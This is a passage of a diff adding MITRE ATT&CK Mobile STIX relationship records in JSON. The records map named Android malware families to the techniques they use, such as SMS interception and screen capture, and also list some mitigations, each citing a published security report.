"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:25:39.509Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect SMS messages.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2065382f-45ae-4b9a-a77c-027ecd6c1735", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:38.651Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect SMS, MMS, and Gmail messages.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--24de6f6e-86d3-4e4e-a965-3e0435205f48", + "created": "2020-09-24T15:34:51.298Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:24:09.872Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can intercept SMS messages.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4b7e117b-0c82-49d0-bee6-119158b3355b", + "created": "2023-02-28T20:32:37.800Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:32:50.168Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can disable Google Play Protect to prevent detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57293fc9-8838-4acd-a16f-48f516d0921e", + "created": "2020-04-08T15:51:25.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:51.699Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) hides its icon after installation.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--80ac52f9-ffa4-4b6e-b420-95d1b69ae9d9", + "type": "relationship", + "created": "2021-01-05T20:16:20.502Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.502Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can take screenshots.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d663cb6f-9fc8-48a0-827f-29757b12ae71", + "created": "2022-03-30T20:53:54.296Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:53:54.296Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5e74f4f8-5057-42f4-9796-aee60122cf6d", + "created": "2019-09-23T13:36:08.451Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) procedurally generates subdomains for command and control communication.(Citation: securelist rotexy 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e33106e1-16ef-41b8-8d47-78c9f2b4dceb", + "created": "2020-11-10T17:08:35.846Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has used specially crafted SMS messages to control the target device.(Citation: Lookout Uyghur Campaign) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--15eccf44-e528-41fb-9cb8-834c8c0ca9d9", + "type": "relationship", + "created": "2020-04-24T17:46:31.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.582Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can collect device network configuration information such as IMSI, IMEI, and Wi-Fi connection state.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b45cf5e0-7427-4d5c-be2c-22f5231493d1", + "type": "relationship", + "created": "2021-10-01T14:42:49.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:49.184Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect the device’s location information based on cellular network or GPS coordinates.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9432fabf-9487-469c-86c9-b9d26b013c85", + "created": "2022-04-01T13:13:10.587Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Call Log access an uncommonly needed permission, so users should be instructedto use extra scrutiny when granting access to their call logs. ", + "modified": "2022-04-01T13:13:10.587Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a98c127b-8da9-4ea5-980e-d154ea541ec9", + "created": "2022-04-01T17:08:15.158Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Filtering requests by checking request origin information may provide some defense against spurious operators.(Citation: CSRIC5-WG10-FinalReport) ", + "modified": "2022-04-11T19:09:00.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e66ec3b-cdd6-461c-bd84-e75316818e15", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) was believed to have been used to obtain locational data of Ukrainian artillery forces.(Citation: CrowdStrike-Android)", + "relationship_type": "uses", + "source_ref": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--319d46b5-de41-4f23-9001-2fa75f954720", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:01:14.020Z", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3d5f7bdf-ab59-48f9-89d5-23f9d8cd235b", + "type": "relationship", + "created": "2021-01-05T20:16:20.419Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.419Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can capture audio from the device’s microphone and can record phone calls.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f051c943-998c-4db2-9dbc-d4755057bcf0", + "created": "2022-04-05T19:49:06.417Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-05T19:49:06.417Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fa222de8-ba3a-45c1-a7eb-d7502843cc2d", + "type": "relationship", + "created": "2021-01-05T20:16:20.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.417Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can capture photos and videos from the device’s camera.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9c7c302a-d5ba-4fc9-a4e5-e865fd7fb708", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "modified": "2019-10-15T19:54:10.284Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole geo-location data.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b360a1c8-8939-428e-bc6e-3f4755bd9ee0", + "created": "2020-10-29T17:48:27.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:18.307Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can intercept SMS messages.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a77c56b-ed2c-4e43-bd0f-7acf9cce1952", + "created": "2020-04-24T17:46:31.564Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:55.378Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can intercept SMS messages.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--81dbe111-0f02-49a1-9bba-42a31e6bb416", + "created": "2023-03-20T18:52:56.247Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:56.247Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6556536c-d5ea-4a3d-ae48-4016d4d762ff", + "type": "relationship", + "created": "2019-09-04T14:28:16.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:52:48.001Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record the screen as the user unlocks the device and can take screenshots of any application in the foreground. [Monokle](https://attack.mitre.org/software/S0407) can also abuse accessibility features to read the screen to capture data from a large number of popular applications.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7260c8fe-6b3b-48a2-889f-f329fb5b4ef0", + "created": "2017-10-25T14:48:53.741Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security architecture improvements in each new version of Android and iOS make it more difficult to escalate privileges. Additionally, newer versions of Android have strengthened the sandboxing applied to applications, restricting their ability to enumerate file system contents.", + "modified": "2022-03-30T20:25:46.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7e2d9773-1320-4c8f-a595-2b92bf0fd8ed", + "created": "2019-07-10T15:35:43.668Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:55:00.294Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) accesses the device contact list.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4154247-90ce-43b9-8c17-5c28f67617f5", + "type": "relationship", + "created": "2020-12-24T21:55:56.747Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.747Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed browser history, as well as the files for 15 other apps.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--529107fd-6420-4573-8dbf-cdcd49c2708c", + "type": "relationship", + "created": "2020-06-26T14:55:13.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.307Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can gather device network information.(Citation: Cybereason EventBot) ", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 